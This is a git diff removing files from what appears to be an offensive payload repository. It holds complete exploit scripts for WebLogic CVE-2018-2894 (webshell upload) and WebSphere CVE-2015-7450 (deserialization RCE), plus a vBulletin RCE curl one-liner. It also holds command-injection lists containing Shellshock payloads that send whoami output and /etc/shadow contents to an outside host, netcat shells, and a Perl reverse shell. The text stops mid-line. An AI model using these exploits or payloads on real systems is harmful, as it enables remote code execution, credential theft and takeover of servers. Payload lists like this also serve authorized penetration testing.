Exploits/WebLogic CVE-2018-2894.py +++ /dev/null @@ -1,128 +0,0 @@ -#!/usr/bin/env python -# coding:utf-8 -# Build By LandGrey - -from __future__ import print_function -from builtins import str -import re -import sys -import time -import argparse -import requests -import traceback -import xml.etree.ElementTree as ET - - -def get_current_work_path(host): - geturl = host + "/ws_utc/resources/setting/options/general" - ua = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0'} - values = [] - try: - request = requests.get(geturl) - if request.status_code == 404: - exit("[-] {} don't exists CVE-2018-2894".format(host)) - elif "Deploying Application".lower() in request.text.lower(): - print("[*] First Deploying Website Please wait a moment ...") - time.sleep(20) - request = requests.get(geturl, headers=ua) - if "" in request.content: - root = ET.fromstring(request.content) - value = root.find("section").find("options") - for e in value: - for sub in e: - if e.tag == "parameter" and sub.tag == "defaultValue": - values.append(sub.text) - except requests.ConnectionError: - exit("[-] Cannot connect url: {}".format(geturl)) - if values: - return values[0] - else: - print("[-] Cannot get current work path\n") - exit(request.content) - - -def get_new_work_path(host): - origin_work_path = get_current_work_path(host) - works = "/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css" - if "user_projects" in origin_work_path: - if "\\" in origin_work_path: - works = works.replace("/", "\\") - current_work_home = origin_work_path[:origin_work_path.find("user_projects")] + "user_projects\\domains" - dir_len = len(current_work_home.split("\\")) - domain_name = origin_work_path.split("\\")[dir_len] - current_work_home += "\\" + domain_name + works - else: - current_work_home = origin_work_path[:origin_work_path.find("user_projects")] + "user_projects/domains" - dir_len = len(current_work_home.split("/")) - domain_name = origin_work_path.split("/")[dir_len] - current_work_home += "/" + domain_name + works - else: - current_work_home = origin_work_path - print("[*] cannot handle current work home dir: {}".format(origin_work_path)) - return current_work_home - - -def set_new_upload_path(host, path): - data = { - "setting_id": "general", - "BasicConfigOptions.workDir": path, - "BasicConfigOptions.proxyHost": "", - "BasicConfigOptions.proxyPort": "80"} - request = requests.post(host + "/ws_utc/resources/setting/options", data=data, headers=headers) - if "successfully" in request.content: - return True - else: - print("[-] Change New Upload Path failed") - exit(request.content) - - -def upload_webshell(host, uri): - set_new_upload_path(host, get_new_work_path(host)) - files = { - "ks_edit_mode": "false", - "ks_password_front": password, - "ks_password_changed": "true", - "ks_filename": ("360sglab.jsp", upload_content) - } - - request = requests.post(host + uri, files=files) - response = request.text - match = re.findall("(.*?)", response) - if match: - tid = match[-1] - shell_path = host + "/ws_utc/css/config/keystore/" + str(tid) + "_360sglab.jsp" - if upload_content in requests.get(shell_path, headers=headers).content: - print("[+] {} exists CVE-2018-2894".format(host)) - print("[+] Check URL: {} ".format(shell_path)) - else: - print("[-] {} don't exists CVE-2018-2894".format(host)) - else: - print("[-] {} don't exists CVE-2018-2894".format(host)) - - -if __name__ == "__main__": - start = time.time() - password = "360sglab" - url = "/ws_utc/resources/setting/keystore" - parser = argparse.ArgumentParser() - parser.add_argument("-t", dest='target', default="http://127.0.0.1:7001", type=str, - help="target, such as: http://example.com:7001") - - upload_content = "360sglab test" - headers = { - 'Content-Type': 'application/x-www-form-urlencoded', - 'X-Requested-With': 'XMLHttpRequest', } - - if len(sys.argv) == 1: - sys.argv.append('-h') - args = parser.parse_args() - target = args.target - - target = target.rstrip('/') - if "://" not in target: - target = "http://" + target - try: - upload_webshell(target, url) - except Exception as e: - print("[-] Error: \n") - traceback.print_exc() diff --git a/CVE Exploits/WebSphere CVE-2015-7450.py b/CVE Exploits/WebSphere CVE-2015-7450.py deleted file mode 100644 index c37215e..0000000 --- a/CVE Exploits/WebSphere CVE-2015-7450.py +++ /dev/null @@ -1,80 +0,0 @@ -#! /usr/bin/env python2 - -#IBM WebSphere Java Object Deserialization RCE (CVE-2015-7450) -#Based on the nessus plugin websphere_java_serialize.nasl -#Made with <3 by @byt3bl33d3r - -from __future__ import print_function -from builtins import chr -import requests -from requests.packages.urllib3.exceptions import InsecureRequestWarning -requests.packages.urllib3.disable_warnings(InsecureRequestWarning) - -import argparse -import sys -import base64 -from binascii import unhexlify - -parser = argparse.ArgumentParser() -parser.add_argument('target', type=str, help='Target IP:PORT') -parser.add_argument('command', type=str, help='Command to run on target') -parser.add_argument('--proto', choices={'http', 'https'}, default='https', help='Send exploit over http or https (default: https)') - -if len(sys.argv) < 2: - parser.print_help() - sys.exit(1) - -args = parser.parse_args() - -if len(args.target.split(':')) != 2: - print('[-] Target must be in format IP:PORT') - sys.exit(1) - -if not args.command: - print('[-] You must specify a command to run') - sys.exit(1) - -elif args.command: - if len(args.command) > 254: - print('[-] Command must be less then 255 bytes') - sys.exit(1) - -ip, port = args.target.split(':') - -print('[*] Target IP: {}'.format(ip)) -print('[*] Target PORT: {}'.format(port)) - -serObj = unhexlify("ACED00057372003273756E2E7265666C6563742E616E6E6F746174696F6E2E416E6E6F746174696F6E496E766F636174696F6E48616E646C657255CAF50F15CB7EA50200024C000C6D656D62657256616C75657374000F4C6A6176612F7574696C2F4D61703B4C0004747970657400114C6A6176612F6C616E672F436C6173733B7870737D00000001000D6A6176612E7574696C2E4D6170787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B78707371007E00007372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E747400124C6A6176612F6C616E672F4F626A6563743B7870767200116A6176612E6C616E672E52756E74696D65000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000274000A67657452756E74696D65757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007400096765744D6574686F647571007E001E00000002767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707671007E001E7371007E00167571007E001B00000002707571007E001B00000000740006696E766F6B657571007E001E00000002767200106A6176612E6C616E672E4F626A656374000000000000000000000078707671007E001B7371007E0016757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017400") -serObj += chr(len(args.command)) + args.command -serObj += unhexlify("740004657865637571007E001E0000000171007E00237371007E0011737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F40000000000010770800000010000000007878767200126A6176612E6C616E672E4F766572726964650000000000000000000000787071007E003A") - -serObjB64 = base64.b64encode(serObj) - -ser1 = "rO0ABXNyAA9qYXZhLnV0aWwuU3RhY2sQ/irCuwmGHQIAAHhyABBqYXZhLnV0aWwuVmVjdG9y2Zd9W4A7rwEDAANJABFjYXBhY2l0eUluY3JlbWVudEkADGVsZW1lbnRDb3VudFsAC2VsZW1lbnREYXRhdAATW0xqYXZhL2xhbmcvT2JqZWN0O3hwAAAAAAAAAAF1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAAKc3IAOmNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3IuSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnTblRMyYyF8sQIABUwACGNlbGxOYW1ldAASTGphdmEvbGFuZy9TdHJpbmc7TAAIaG9zdE5hbWVxAH4AB0wACG5vZGVOYW1lcQB+AAdMAApzZXJ2ZXJOYW1lcQB+AAdbAApzdGFja1RyYWNldAAeW0xqYXZhL2xhbmcvU3RhY2tUcmFjZUVsZW1lbnQ7eHB0AAB0AAhMYXAzOTAxM3EAfgAKcQB+AAp1cgAeW0xqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnQ7AkYqPDz9IjkCAAB4cAAAACpzcgAbamF2YS5sYW5nLlN0YWNrVHJhY2VFbGVtZW50YQnFmiY23YUCAARJAApsaW5lTnVtYmVyTAAOZGVjbGFyaW5nQ2xhc3NxAH4AB0wACGZpbGVOYW1lcQB+AAdMAAptZXRob2ROYW1lcQB+AAd4cAAAAEt0ADpjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHRFbGVtZW50dAAfSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnQuamF2YXQABjxpbml0PnNxAH4ADgAAADx0ADNjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHR0ABhKTVhDb25uZWN0b3JDb250ZXh0LmphdmF0AARwdXNoc3EAfgAOAAAGQ3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAcZ2V0Sk1YQ29ubmVjdG9yQ29udGV4dEhlYWRlcnNxAH4ADgAAA0h0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQAEmludm9rZVRlbXBsYXRlT25jZXNxAH4ADgAAArF0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQADmludm9rZVRlbXBsYXRlc3EAfgAOAAACp3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAOaW52b2tlVGVtcGxhdGVzcQB+AA4AAAKZdAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA4AAAHndAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA7/////dAAVY29tLnN1bi5wcm94eS4kUHJveHkwcHQABmludm9rZXNxAH4ADgAAAOB0ACVjb20uaWJtLndzLm1hbmFnZW1lbnQuQWRtaW5DbGllbnRJbXBsdAAUQWRtaW5DbGllbnRJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAADYdAA9Y29tLmlibS53ZWJzcGhlcmUubWFuYWdlbWVudC5jb25maWdzZXJ2aWNlLkNvbmZpZ1NlcnZpY2VQcm94eXQAF0NvbmZpZ1NlcnZpY2VQcm94eS5qYXZhdAARZ2V0VW5zYXZlZENoYW5nZXNzcQB+AA4AAAwYdAAmY29tLmlibS53cy5zY3JpcHRpbmcuQWRtaW5Db25maWdDbGllbnR0ABZBZG1pbkNvbmZpZ0NsaWVudC5qYXZhdAAKaGFzQ2hhbmdlc3NxAH4ADgAAA/Z0AB5jb20uaWJtLndzLnNjcmlwdGluZy5XYXN4U2hlbGx0AA5XYXN4U2hlbGwuamF2YXQACHRpbWVUb0dvc3EAfgAOAAAFm3QAImNvbS5pYm0ud3Muc2NyaXB0aW5nLkFic3RyYWN0U2hlbGx0ABJBYnN0cmFjdFNoZWxsLmphdmF0AAtpbnRlcmFjdGl2ZXNxAH4ADgAACPp0ACJjb20uaWJtLndzLnNjcmlwdGluZy5BYnN0cmFjdFNoZWxsdAASQWJzdHJhY3RTaGVsbC5qYXZhdAADcnVuc3EAfgAOAAAElHQAHmNvbS5pYm0ud3Muc2NyaXB0aW5nLldhc3hTaGVsbHQADldhc3hTaGVsbC5qYXZhdAAEbWFpbnNxAH4ADv////50ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQAB2ludm9rZTBzcQB+AA4AAAA8dAAkc3VuLnJlZmxlY3QuTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsdAAdTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAAAldAAoc3VuLnJlZmxlY3QuRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbHQAIURlbGVnYXRpbmdNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAAmN0ABhqYXZhLmxhbmcucmVmbGVjdC5NZXRob2R0AAtNZXRob2QuamF2YXQABmludm9rZXNxAH4ADgAAAOp0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAKbGF1bmNoTWFpbnNxAH4ADgAAAGB0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAEbWFpbnNxAH4ADgAAAE10ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAACS3QANG9yZy5lY2xpcHNlLmVxdWlub3guaW50ZXJuYWwuYXBwLkVjbGlwc2VBcHBDb250YWluZXJ0ABhFY2xpcHNlQXBwQ29udGFpbmVyLmphdmF0ABdjYWxsTWV0aG9kV2l0aEV4Y2VwdGlvbnNxAH4ADgAAAMZ0ADFvcmcuZWNsaXBzZS5lcXVpbm94LmludGVybmFsLmFwcC5FY2xpcHNlQXBwSGFuZGxldAAVRWNsaXBzZUFwcEhhbmRsZS5qYXZhdAADcnVuc3EAfgAOAAAAbnQAPG9yZy5lY2xpcHNlLmNvcmUucnVudGltZS5pbnRlcm5hbC5hZGFwdG9yLkVjbGlwc2VBcHBMYXVuY2hlcnQAF0VjbGlwc2VBcHBMYXVuY2hlci5qYXZhdAAOcnVuQXBwbGljYXRpb25zcQB+AA4AAABPdAA8b3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmludGVybmFsLmFkYXB0b3IuRWNsaXBzZUFwcExhdW5jaGVydAAXRWNsaXBzZUFwcExhdW5jaGVyLmphdmF0AAVzdGFydHNxAH4ADgAAAXF0AC9vcmcuZWNsaXBzZS5jb3JlLnJ1bnRpbWUuYWRhcHRvci5FY2xpcHNlU3RhcnRlcnQAE0VjbGlwc2VTdGFydGVyLmphdmF0AANydW5zcQB+AA4AAACzdAAvb3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmFkYXB0b3IuRWNsaXBzZVN0YXJ0ZXJ0ABNFY2xpcHNlU3RhcnRlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAABVHQAHm9yZy5lY2xpcHNlLmNvcmUubGF1bmNoZXIuTWFpbnQACU1haW4uamF2YXQAD2ludm9rZUZyYW1ld29ya3NxAH4ADgAAARp0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AAhiYXNpY1J1bnNxAH4ADgAAA9V0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AANydW5zcQB+AA4AAAGQdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQADWxhdW5jaEVjbGlwc2VzcQB+AA4AAACjdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQABG1haW5wcHBwcHBwcHB4" - -ser2 = "rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==" - -#This was in the nessus plugin, but wasn't used anywhwere :/ -#ser3 = "rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAFzcgAkY29tLmlibS53ZWJzcGhlcmUubWFuYWdlbWVudC5TZXNzaW9uJ5mLeyYSGOUCAANKAAJpZFoADnNoYXJlV29ya3NwYWNlTAAIdXNlck5hbWV0ABJMamF2YS9sYW5nL1N0cmluZzt4cAAAAVEDKkaUAXQAEVNjcmlwdDE1MTAzMmE0Njk0" - -ser4 = "rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=" - -xmlObj ="\r\n" -xmlObj +='\r\n' -xmlObj +='\r\n'.format(ser1=ser1) -xmlObj +='\r\n' -xmlObj +='\r\n' -xmlObj +='\r\n' -xmlObj +='{ser2}\r\n'.format(ser2=ser2) -xmlObj +='getUnsavedChanges\r\n' -xmlObj +='{serObjB64}\r\n'.format(serObjB64=serObjB64) -xmlObj +='{ser4}\r\n'.format(ser4=ser4) -xmlObj +='\r\n' -xmlObj +='\r\n' -xmlObj +='' - -headers = {'Content-Type': 'text/xml; charset=utf-8', - 'SOAPAction': 'urn:AdminService'} - -r = requests.post('{}://{}:{}'.format(args.proto, ip, port), data=xmlObj, headers=headers, verify=False) -print('[*] HTTPS request sent successfully') diff --git a/CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh b/CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh deleted file mode 100644 index 3ebf64a..0000000 --- a/CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh +++ /dev/null @@ -1 +0,0 @@ -curl https://example.com/index.php\?routestring\=ajax/render/widget_php --connect-timeout 5 --max-time 15 -s -k --data "widgetConfig[code]=echo system('id');exit;" \ No newline at end of file diff --git a/Command Injection/Intruder/command-execution-unix.txt b/Command Injection/Intruder/command-execution-unix.txt deleted file mode 100644 index 30d957a..0000000 --- a/Command Injection/Intruder/command-execution-unix.txt +++ /dev/null @@ -1,83 +0,0 @@ -<!--#exec%20cmd="/bin/cat%20/etc/passwd"--> -<!--#exec%20cmd="/bin/cat%20/etc/shadow"--> -<!--#exec%20cmd="/usr/bin/id;--> -<!--#exec%20cmd="/usr/bin/id;--> -/index.html|id| -";id;" -';id;' -;id; -;id -;netstat -a; -"|id|" -'|id|' -|id -|/usr/bin/id -|id| -"|/usr/bin/id|" -'|/usr/bin/id|' -|/usr/bin/id| -"||/usr/bin/id|" -'||/usr/bin/id|' -||/usr/bin/id| -|id; -||/usr/bin/id; -;id| -;|/usr/bin/id| -"\n/bin/ls -al\n" -'\n/bin/ls -al\n' -\n/bin/ls -al\n -\n/usr/bin/id\n -\nid\n -\n/usr/bin/id; -\nid; -\n/usr/bin/id| -\nid| -;/usr/bin/id\n -;id\n -|usr/bin/id\n -|nid\n -`id` -`/usr/bin/id` -a);id -a;id -a);id; -a;id; -a);id| -a;id| -a)|id -a|id -a)|id; -a|id -|/bin/ls -al -a);/usr/bin/id -a;/usr/bin/id -a);/usr/bin/id; -a;/usr/bin/id; -a);/usr/bin/id| -a;/usr/bin/id| -a)|/usr/bin/id -a|/usr/bin/id -a)|/usr/bin/id; -a|/usr/bin/id -;system('cat%20/etc/passwd') -;system('id') -;system('/usr/bin/id') -%0Acat%20/etc/passwd -%0A/usr/bin/id -%0Aid -%22%0A/usr/bin/id%0A%22 -%27%0A/usr/bin/id%0A%27 -%0A/usr/bin/id%0A -%0Aid%0A -"& ping -i 30 127.0.0.1 &" -'& ping -i 30 127.0.0.1 &' -& ping -i 30 127.0.0.1 & -& ping -n 30 127.0.0.1 & -%0a ping -i 30 127.0.0.1 %0a -`ping 127.0.0.1` -| id -& id -; id -%0a id %0a -`id` -$;/usr/bin/id diff --git a/Command Injection/Intruder/command_exec.txt b/Command Injection/Intruder/command_exec.txt deleted file mode 100644 index e0e0b0e..0000000 --- a/Command Injection/Intruder/command_exec.txt +++ /dev/null @@ -1,448 +0,0 @@ -` -|| -| -; -' -'" -" -"' -& -&& -%0a -%0a%0d -%0Acat%20/etc/passwd -%0Aid -%0a id %0a -%0Aid%0A -%0a ping -i 30 127.0.0.1 %0a -%0A/usr/bin/id -%0A/usr/bin/id%0A -%2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1 -%20{${phpinfo()}} -%20{${sleep(20)}} -%20{${sleep(3)}} -a|id| -a;id| -a;id; -a;id\n -() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=16?user=\`whoami\`" -() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=18?pwd=\`pwd\`" -() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=20?shadow=\`grep root /etc/shadow\`" -() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\`uname -a\`" -() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=24?shell=\`nc -lvvp 1234 -e /bin/bash\`" -() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=26?shell=\`nc -lvvp 1236 -e /bin/bash &\`" -() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=5" -() { :;}; /bin/bash -c "sleep 1 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=1&?vuln=6" -() { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1" -() { :;}; /bin/bash -c "sleep 3 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=3&?vuln=7" -() { :;}; /bin/bash -c "sleep 3 && echo vulnerable 3" -() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=6&?vuln=8" -() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=9&?vuln=9" -() { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6" -() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=17?user=\`whoami\`" -() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=19?pwd=\`pwd\`" -() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=21?shadow=\`grep root /etc/shadow\`" -() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=23?uname=\`uname -a\`" -() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=25?shell=\`nc -lvvp 1235 -e /bin/bash\`" -() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=27?shell=\`nc -lvvp 1237 -e /bin/bash &\`" -() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=4" -cat /etc/hosts -$(`cat /etc/passwd`) -cat /etc/passwd -() { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12 -| curl http://crowdshield.com/.testing/rce.txt -& curl http://crowdshield.com/.testing/rce.txt -; curl https://crowdshield.com/.testing/rce_vuln.txt -&& curl https://crowdshield.com/.testing/rce_vuln.txt -curl https://crowdshield.com/.testing/rce_vuln.txt - curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt -curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt -$(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`) -dir -| dir -; dir -$(`dir`) -& dir -&&dir -&& dir -| dir C:\ -; dir C:\ -& dir C:\ -&& dir C:\ -dir C:\ -| dir C:\Documents and Settings\* -; dir C:\Documents and Settings\* -& dir C:\Documents and Settings\* -&& dir C:\Documents and Settings\* -dir C:\Documents and Settings\* -| dir C:\Users -; dir C:\Users -& dir C:\Users -&& dir C:\Users -dir C:\Users -;echo%20'' -echo ''// XXXXXXXXXXX -| echo "" > rfi.php -; echo "" > rfi.php -& echo "" > rfi.php -&& echo "" > rfi.php -echo "" > rfi.php -| echo "" > dir.php -; echo "" > dir.php -& echo "" > dir.php -&& echo "" > dir.php -echo "" > dir.php -| echo "" > cmd.php -; echo "" > cmd.php -& echo "" > cmd.php -&& echo "" > cmd.php -echo "" > cmd.php -;echo '' -echo ''// XXXXXXXXXXX -echo ''// XXXXXXXXXXX -| echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl -; echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl -& echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl -&& echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl -echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl -() { :;}; echo vulnerable 10 -eval('echo 